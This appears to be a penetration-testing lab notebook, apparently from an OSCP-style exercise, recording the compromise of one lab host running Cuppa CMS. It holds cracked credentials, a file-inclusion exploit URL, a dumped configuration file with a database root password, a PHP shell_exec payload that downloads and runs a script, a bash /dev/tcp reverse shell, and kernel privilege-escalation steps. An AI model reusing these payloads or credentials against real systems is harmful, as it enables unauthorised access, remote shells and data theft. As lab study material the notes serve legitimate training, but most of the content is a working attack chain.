Professional Documents
Culture Documents
php
password "admin"
aaron:italia99
accasia:WindRunner
deanna:marianna
jpotter:vipsu
https://www.exploit-db.com/exploits/25971
http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=php://
filter/convert.base64-encode/resource=../Configuration.php
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "99bbVDdorGzfZJun";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg;
*.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf;
*.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
http://10.11.1.116/administrator/
user: admin
passw: admin
https://www.exploit-db.com/exploits/24044
Proof of Concept:
2. Now create a new table in this database and insert a text field with the default
value:
1) <?php echo shell_exec("wget http://IP/reverse.sh -O /tmp/reverseshell.sh");?>
2) <?php echo shell_exec("chmod 777 /tmp/reverseshell.sh");?>
3) <?php echo shell_exec("/bin/bash /tmp/reverseshell.sh");?>
reverseshell.sh
bash -i >& /dev/tcp/IP/4444 0>&1
10.11.1.116/administrator/alerts/alertConfigField.php?
urlConfig=../../../../../../../../../usr/local/databases/hack.php
privesc:
Kernel
Linux version 4.4.0-116-generic - https://www.exploit-db.com/exploits/44298 CVE-
2017-16995
wget
chmod
./exploit